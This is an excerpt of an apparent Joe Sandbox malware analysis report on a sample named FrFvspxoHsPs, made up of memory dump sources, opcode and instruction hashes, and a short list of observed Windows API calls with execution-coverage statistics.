                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4d3390a97f38d80382b585f682ba08942a5dbae43dad857bbbf054f00f90ddb6
                                • Instruction ID: f27854e5a5066bdbbf94decfbace5c994e2b534ed0cee5e3563d944f51c590d5
                                • Opcode Fuzzy Hash: 4d3390a97f38d80382b585f682ba08942a5dbae43dad857bbbf054f00f90ddb6
                                • Instruction Fuzzy Hash: 6411A0317546058BE318DA6AC45175BB7EBF788704F908C3EE686C7781CB71A8448790
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ce43c7aee5ce6741cb8a630dddfcb2c09d8691125d811258e72e24f406ab5d0c
                                • Instruction ID: a3352ac3a7ac8fbb9860b42d5bce3b03fa9fd914964cef88e5479880b7bd7baf
                                • Opcode Fuzzy Hash: ce43c7aee5ce6741cb8a630dddfcb2c09d8691125d811258e72e24f406ab5d0c
                                • Instruction Fuzzy Hash: 75218134A00709CFC754EB74C454AAABBB7FFC5315F0088ADD05A1B264DF75A88ACB81
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ed2b518fe6063f2472d8e4404c750b288d1681b65d899befc532b65905ae5462
                                • Instruction ID: 173b802189d832d13224ef1f873bd9452f866dbc8780e7a814547484e2b9e9b3
                                • Opcode Fuzzy Hash: ed2b518fe6063f2472d8e4404c750b288d1681b65d899befc532b65905ae5462
                                • Instruction Fuzzy Hash: 3D1102357541008FE314DA7AD442B5AB3DBFB88314F908C3EDA8ADB781CB75B4458B90
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 71306bff222826f5ca698d4438b5e1faaf3fb8cb323ba9c8f268f75f006c290a
                                • Instruction ID: a32926119d9c869e60b3f9ccd4927ddb28f93d40a2caac4c3cd05962ad4a718a
                                • Opcode Fuzzy Hash: 71306bff222826f5ca698d4438b5e1faaf3fb8cb323ba9c8f268f75f006c290a
                                • Instruction Fuzzy Hash: 0721DF34A00709CFC755EB74C444BAABBB6FFC5311F0088ADC05A5B260CF34A88ACB91
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c9473d0200e990f4f7c770019e868f1c75c84e99be25dcf4aa9d1d364d4b4184
                                • Instruction ID: ba475d0b30607ebc53f27fc5330b2b4ad4ac050be58088392e0f94f5cadc17af
                                • Opcode Fuzzy Hash: c9473d0200e990f4f7c770019e868f1c75c84e99be25dcf4aa9d1d364d4b4184
                                • Instruction Fuzzy Hash: 8D110D35B002198FCF54EBE99810AEEBBB6BFC4715B5040AEC505A7240EB369D05CBA5
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f537f3190df3ccbc2fba66a36df941eebd8f7e8879e9ee9baa2a6b5a7f85245f
                                • Instruction ID: ef2039265348deee28812b35a6abe31afe21c21d75de3b9845645e8f9a2a50cb
                                • Opcode Fuzzy Hash: f537f3190df3ccbc2fba66a36df941eebd8f7e8879e9ee9baa2a6b5a7f85245f
                                • Instruction Fuzzy Hash: DF015235E002198F8F54EAE998556EEBBFABB84355B5044AEC405E7300EB329905CBA1
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1490869733.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_13fd000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                • Instruction ID: 22b8dfee013e3c502b0b7ab1e94880856fd4ab1410b5b9e0c7fb46a97451e85c
                                • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                • Instruction Fuzzy Hash: 7611DF72404280CFCB02CF54D5C8B16BF71FB84318F24C6ADD9090B656C336D45ACBA2
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1492607797.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_140d000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction ID: e01e75673a5e9599b9df801fb9e7f924bb453f6a0827ed46d1ec2e4be04125ab
                                • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction Fuzzy Hash: 7811BE75904240DFCB02CF94C5C0B16BB61FB84224F24C6AED8494B7A6C33AD44ACB51
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 10a017d33af77f77b367e2494843f27d26e3a1ce83c92adcbdc4a5acc3a62cba
                                • Instruction ID: 05cc982212e61c71170290525145be7f63d90dbc09f4f20ac61bfe6e0c4722c6
                                • Opcode Fuzzy Hash: 10a017d33af77f77b367e2494843f27d26e3a1ce83c92adcbdc4a5acc3a62cba
                                • Instruction Fuzzy Hash: 381122703003025BEB54AB68D41579A77C2EB94318F10C96EE4998F3C3CEFBA84687E1
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3f258fc628643d52747389d4ef2d2415570b2fc1bcd3d7d7f8fb487d9b8da9f0
                                • Instruction ID: e44cbf9277a321b20e183ac4e956f2267d2584b32cbaf65f4d17e301064286a9
                                • Opcode Fuzzy Hash: 3f258fc628643d52747389d4ef2d2415570b2fc1bcd3d7d7f8fb487d9b8da9f0
                                • Instruction Fuzzy Hash: C71104303003125BE700A768D41579A76C6EB94304F10C96EE18A8F3C3CEF7A84587E1
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 884f299032a8b5d5c09e30f4a0444041fde20f813b4d18d5763f66258ca1ee71
                                • Instruction ID: c73704d296892dfbb9ab3b442500d510b5af81fffeea6145ad62d5a56c074ef6
                                • Opcode Fuzzy Hash: 884f299032a8b5d5c09e30f4a0444041fde20f813b4d18d5763f66258ca1ee71
                                • Instruction Fuzzy Hash: C611E2B5C142098FDB10DF9AD444B9EFBF4EB48220F14841AD858A3250D3B8A505CFA1
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 48f9626d803dd0927f5b044d3a59a13cf1d50b1ede8c55784cd9f7f6308cbfa4
                                • Instruction ID: 689471756b477779c777282677f540c0c64c0621edb201cb7b367f98ad44d09e
                                • Opcode Fuzzy Hash: 48f9626d803dd0927f5b044d3a59a13cf1d50b1ede8c55784cd9f7f6308cbfa4
                                • Instruction Fuzzy Hash: A001F772E002156BD704BB68D4617EE7BF6AF90708F4544AEC402AB780DEB55D4887DA
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ce30bb1bb82933c33b95e32abda67d5b1a7df98339b5e2fed14dc8981d682394
                                • Instruction ID: 5a2adcfc87350029fb68f06bb4e89de7a5ec536d85cac3df47db73fd8dbb1102
                                • Opcode Fuzzy Hash: ce30bb1bb82933c33b95e32abda67d5b1a7df98339b5e2fed14dc8981d682394
                                • Instruction Fuzzy Hash: F411C0B5C046498FDB10DF9AD448B9EFBF4EB88320F14846AD859A7250D3B8A545CFA1
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a8df95f97e489fd986d6a837e2ae64ece9567bbe2a3600246c8c3a1041dbeb1b
                                • Instruction ID: 2915442b9e88a6a603aeedb4462e2fd51ed2a6a4f50a091c7a9443c24eead264
                                • Opcode Fuzzy Hash: a8df95f97e489fd986d6a837e2ae64ece9567bbe2a3600246c8c3a1041dbeb1b
                                • Instruction Fuzzy Hash: 14012635B093445FDB04DBF898685AE7FEAAFC5210B0484EFD409D7742EA748C408394
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4ff23a801574eaf6fd872a94ad80813ddb9d3dc6b970d91c5ac021858b39d0d1
                                • Instruction ID: 1dbec514b9ab4293067e85467e06c3da7428a4f03b3c4f58436a1b56a53a9a5d
                                • Opcode Fuzzy Hash: 4ff23a801574eaf6fd872a94ad80813ddb9d3dc6b970d91c5ac021858b39d0d1
                                • Instruction Fuzzy Hash: 8211F2B59042498FDB20DF9AD484B9EFBF4FB48320F10845AE959A7340D774A944CFA5
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: aaecf7b8d56a04672969dd3772427e830293105b12c5af5015b273d1f53edaa7
                                • Instruction ID: 6a167ef91167a3d260fa8e6c517ccb4d24f7c56b91a2876e429317d23437e892
                                • Opcode Fuzzy Hash: aaecf7b8d56a04672969dd3772427e830293105b12c5af5015b273d1f53edaa7
                                • Instruction Fuzzy Hash: 6111F2B59042498FDB20DF9AD484B9EBBF4FB48320F10845AE959A7340D774A944CFA5
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c33a0f74f3eda3462c285cbc84920fbaef177485d4aaa246a7795ee61337e7e0
                                • Instruction ID: 233c293d938da9d4e997cd7e03c85f887db59886d122b56a868885bf6de16f03
                                • Opcode Fuzzy Hash: c33a0f74f3eda3462c285cbc84920fbaef177485d4aaa246a7795ee61337e7e0
                                • Instruction Fuzzy Hash: 91F0D132344A515FCB1B6AA4881563D3EFABFC572070540FED40ACF391DE3888128395
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4746dbf878430ccfb790d3b4a2473503056595dd64b563c795307dc00a93f3e4
                                • Instruction ID: 3a1f2de9d1089b15e8ce38a00095e4e2009ea6a7770c9af95d3a5ba86dee61ef
                                • Opcode Fuzzy Hash: 4746dbf878430ccfb790d3b4a2473503056595dd64b563c795307dc00a93f3e4
                                • Instruction Fuzzy Hash: 2211FEB58042498FDB20DF9AD484BDEBBF4EB48320F24845AD959A7340C379A944CFA5
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8efd3b82c392c9d460735bf5c89e9f4d9f9029737d1f24485053830a75ed98c6
                                • Instruction ID: 039d739a7ad654db83f656e0eb17ab85ff13bd50c211fdfc5a9b01913ad9ed7f
                                • Opcode Fuzzy Hash: 8efd3b82c392c9d460735bf5c89e9f4d9f9029737d1f24485053830a75ed98c6
                                • Instruction Fuzzy Hash: 81113071800208DFDB10CF9AC499BDABEF1FB48321F24C06DE828AB390C7758985CB94
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 62bed2a977e2d966168c38ae60c287f14dcaa9d09dbc5d6b54479ca9db2e3ac8
                                • Instruction ID: d2fa87136d3944d2ea550a452e33de377a7473a66f1ab67c00a2386c4dc71de8
                                • Opcode Fuzzy Hash: 62bed2a977e2d966168c38ae60c287f14dcaa9d09dbc5d6b54479ca9db2e3ac8
                                • Instruction Fuzzy Hash: E6F0A4313407100FD714A6A9D469B6F3AD6BBC8B24F00455DE8068B3D2DFAAE94283D4
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6fb04f0f9260cec8ffbfeb7df8d21a3261c998de0a66a3002aa74b84d67fe5f6
                                • Instruction ID: 0ee6c5f77cb35ce93a247a6d5851661c76dd486bbd68ad968b32ea73e3b9cf0d
                                • Opcode Fuzzy Hash: 6fb04f0f9260cec8ffbfeb7df8d21a3261c998de0a66a3002aa74b84d67fe5f6
                                • Instruction Fuzzy Hash: 0AE0C237504182DFCF0297D4EC02B88BFA0FF92722F4685E6D1808B160D6268138D792
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cfca43f32729c4af11d7478c28df830012e026154c20044f15a04568d28bd5bc
                                • Instruction ID: 670b89a9567b19ba89accae2d088497a6f42cb8f469d16b27ee3ee6d35163450
                                • Opcode Fuzzy Hash: cfca43f32729c4af11d7478c28df830012e026154c20044f15a04568d28bd5bc
                                • Instruction Fuzzy Hash: 91D02B373001107FCB046B28E406E9A3BE8DB1F310B148066F508C3311CE21DC015690
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1f87ed6f46e36cdfcf260930225041f49d1d7a71ca6c9d41a6cbde3858bb7dc9
                                • Instruction ID: c48374f5fe04fccfa7fa7088b5d0d92c0e9812237e5fde48c88da4d63db6cae8
                                • Opcode Fuzzy Hash: 1f87ed6f46e36cdfcf260930225041f49d1d7a71ca6c9d41a6cbde3858bb7dc9
                                • Instruction Fuzzy Hash: BFE0EC71A0120DEFDB00EFA4E95186D7BFAFB58614B20859ED809E3314EB726E14EB51
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 065f7c4d5be2027b65ac110ef62fbc04824e3dc6a8f57459729aa3a63af4bca3
                                • Instruction ID: a2e8649661537b01487a20c7586a63ed013cdd08873c6f10c8bb882ea128bcbb
                                • Opcode Fuzzy Hash: 065f7c4d5be2027b65ac110ef62fbc04824e3dc6a8f57459729aa3a63af4bca3
                                • Instruction Fuzzy Hash: DBE0123AA4100DAFCF00CFC0E940BDEBB32FB88315F208019FA012A290C7326A21DB91
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5ae1a5ba572bc9d0c73e0f77ab6ac1d8110e536a79176fa69114ac096c50acd0
                                • Instruction ID: 379db27631d03471ba7d47df2a9fc1c9f19bcb71d78b35f4a5cf1fc4e0a99b1c
                                • Opcode Fuzzy Hash: 5ae1a5ba572bc9d0c73e0f77ab6ac1d8110e536a79176fa69114ac096c50acd0
                                • Instruction Fuzzy Hash: 4DD05E317046140BC7096659901079AB6DA9FC9751F05C4BFE50A8B392C9B19C0002E5
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c6339485bedba07878a9e9d280d7ddae8d990a5e35397f0839b1bcbace9d60d1
                                • Instruction ID: 76b78b4a0a38a70b5ec1eca51f9045b0f2143967bc9ed10ff0931a429c6838ac
                                • Opcode Fuzzy Hash: c6339485bedba07878a9e9d280d7ddae8d990a5e35397f0839b1bcbace9d60d1
                                • Instruction Fuzzy Hash: FBD012B7B144151BDB5014E9B942BF62FC8B74BB71F4904AEE50CC2200F558C4420681
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 997a6f16d8bed8da8483b4628bf28d3cd960fb4b02ba02a22bd842901ef56e30
                                • Instruction ID: 8c6232d7ca7aff730b55e7a004c6619ad6bbee5d3985f216b69d78e99b036038
                                • Opcode Fuzzy Hash: 997a6f16d8bed8da8483b4628bf28d3cd960fb4b02ba02a22bd842901ef56e30
                                • Instruction Fuzzy Hash: 87D0C93A310124AF8704AB68E408CA97FE9EB4D6613158066F909C7321CE72DC119BD4
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a634a98b945aefd0a41ae3507fa7a76b750b094519424c5c693d1d24066d3c58
                                • Instruction ID: 369f1a8cf7a5cfddb3f3c53939d8df85ca51fc0089a3459eb5389cf7aefc4a95
                                • Opcode Fuzzy Hash: a634a98b945aefd0a41ae3507fa7a76b750b094519424c5c693d1d24066d3c58
                                • Instruction Fuzzy Hash: 12B09B3131563517D50431DD642469E769E47C5B60F40406B960D877424DC59C4102E9
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 15233e458f974485cd9dda7ddf320d5fef316d79729f2e8efcbb07408f7950b2
                                • Instruction ID: eb38a2136279c6297a687552cf8c719900fdf73e881983ecd3e5c6bc5d1f7318
                                • Opcode Fuzzy Hash: 15233e458f974485cd9dda7ddf320d5fef316d79729f2e8efcbb07408f7950b2
                                • Instruction Fuzzy Hash: 4FC0120D30DBC20EEB13A6B00C98A712EAB2AC3300F8980CE9480850A39068888A8722
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c63055a45eeb4ae8ae8d6e3381b45a0748b663f32349da8a3f0a884f24e2bbca
                                • Instruction ID: 103967bf13f508402a192ef6221732069224ae084a114efb1bafc53f37aadea3
                                • Opcode Fuzzy Hash: c63055a45eeb4ae8ae8d6e3381b45a0748b663f32349da8a3f0a884f24e2bbca
                                • Instruction Fuzzy Hash: BCD0C93614010CEFCB01CF95D844D9A3BBAFF48720F008054FA084B232C332E821EB90
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ec24d64894e5ae284e638b142351f48792eb7552004802f228a52af462c7bd7f
                                • Instruction ID: 3748cc999081365b32b72c4fe9f0fa1c42623fab1e8201ce5acfbd085e5fc9d7
                                • Opcode Fuzzy Hash: ec24d64894e5ae284e638b142351f48792eb7552004802f228a52af462c7bd7f
                                • Instruction Fuzzy Hash: 60C04C39254105EF9B41AB90D998D597BA5FF95305B41DCD5614546020CA36C418E712
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0eed207713146462f905683fc514a2e9e83f393ce9692d493e296ee49461ae50
                                • Instruction ID: d963871f999922be2078ef17e19e3f60ccbfeecff0c234b898d625d75fb16a3e
                                • Opcode Fuzzy Hash: 0eed207713146462f905683fc514a2e9e83f393ce9692d493e296ee49461ae50
                                • Instruction Fuzzy Hash: 1BB01238204501076A04F1F21CC412605277ED07013C4CC9810010000448345042202A
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8fc304a26ba6a9b8e09db51e88682a954301326f375d2764bec1dfa900b44145
                                • Instruction ID: 44325f88c0735b381380062a5feff2017e51146eae13a71bf66922ca7796926e
                                • Opcode Fuzzy Hash: 8fc304a26ba6a9b8e09db51e88682a954301326f375d2764bec1dfa900b44145
                                • Instruction Fuzzy Hash: D1B09237A0400889DB108AC5B8413EEFB20F780335F104467C21652541837201A496D1

                                Execution Graph

                                Execution Coverage:13.2%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:323
                                Total number of Limit Nodes:24
                                Strings
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-3993045852
                                • Opcode ID: 720071a50f236250fd6ea713bbbc59ce33d5cb7ebbebf043fae972c74b4f10e1
                                • Instruction ID: fdb3bd20843ab26552811f2e637f72c2d452998b9bd0833877f80f3b9db79e22
                                • Opcode Fuzzy Hash: 720071a50f236250fd6ea713bbbc59ce33d5cb7ebbebf043fae972c74b4f10e1
                                • Instruction Fuzzy Hash: F622B075E042188FDF64EBA8C4846AEBFB2EF89320F248569D415AB744DB35DC45CB90

                                Control-flow Graph (API node: CreateWindowExW)
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06F3604A
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3901794104.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f30000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0

                                Control-flow Graph (API node: DeleteFileW)
                                APIs
                                • DeleteFileW.KERNEL32(00000000), ref: 032180B0
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3859634733.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_3210000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0

                                Control-flow Graph (API node: CreateWindowExW)
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06F3604A
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3901794104.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f30000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0

                                Control-flow Graph (API node: CreateWindowExW)
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06F3604A
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3901794104.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f30000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0

                                Control-flow Graph (API node: GlobalMemoryStatusEx)
                                Memory Dump Source
